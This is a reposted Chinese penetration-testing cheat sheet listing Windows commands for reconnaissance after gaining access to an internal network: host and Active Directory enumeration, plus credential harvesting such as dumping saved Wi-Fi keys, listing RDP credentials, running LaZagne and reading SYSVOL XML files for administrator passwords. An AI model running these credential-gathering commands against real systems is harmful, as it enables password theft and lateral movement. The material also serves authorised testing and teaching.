当前主机信息收集
常用信息收集
whoami #查看当前用户权限
net user #查看所有用户
query user #查看当前在线用户
ipconfig /all #查看ip/dns等信息
route print #查看路由表信息
arp -a #查看arp解析情况
tasklist /svc #查看进程及对应服务名
net localgroup administrators #查看管理员组成员
systeminfo #查看系统补丁信息
net use #查看IPC连接情况
net share #查看文件共享
net view #查看匿名共享情况
#查看防火墙状态
cmdkey /l #查看当前保存的登陆凭证
密码搜集
netsh wlan show profiles # 查看连接过的wifi名称
netsh wlan show profile name="wifi名称" key=clear # 查看wifi的密码
dir /a %userprofile%AppDataLocalMicrosoftCredentials* # 查看RDP连接凭证
dir /a /s /b "网站目录*config*" > 1.txt # 数据库配置文件
laZagne.exe all -oN # 本地wifi/浏览器等密码
dir %APPDATA%MicrosoftWindowsRecent # 查看最近打开的文档
ping www.baidu.com # ICMP连通性
nslookup www.baidu.com # DNS连通性
curl https://www.baidu.com # http连通性
nc ip port # TCP连通性
域信息收集
常用信息搜集
net config workstation
net user /domain
net view /domain
net view /domain:XXX
net group /domain
net group "domain computers" /domain
net group "domain admins" /domain
net group "domain controllers" /domain
net group "enterprise admins" /domain
nltest /domain_trusts
net time /domain
net accounts /domain
dsquery server
netdom query pdc
wmic useraccount get /all
环境信息搜集
nbtscan.exe xx.xx.xx.xx/24 # 查看c段机器
csvde.exe -f 1.csv -k # 批量导入/导出AD用户
setspn.exe -T xx.xx.xx.xx -Q / # 查看当前域内所有spn
密码搜集
dir /s /a 域控IPSYSVOL*.xml # 获取域里面所有机子的本地管理员账号密码
原文始发于微信公众号(星冥安全):内网渗透之信息搜集-windows篇
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论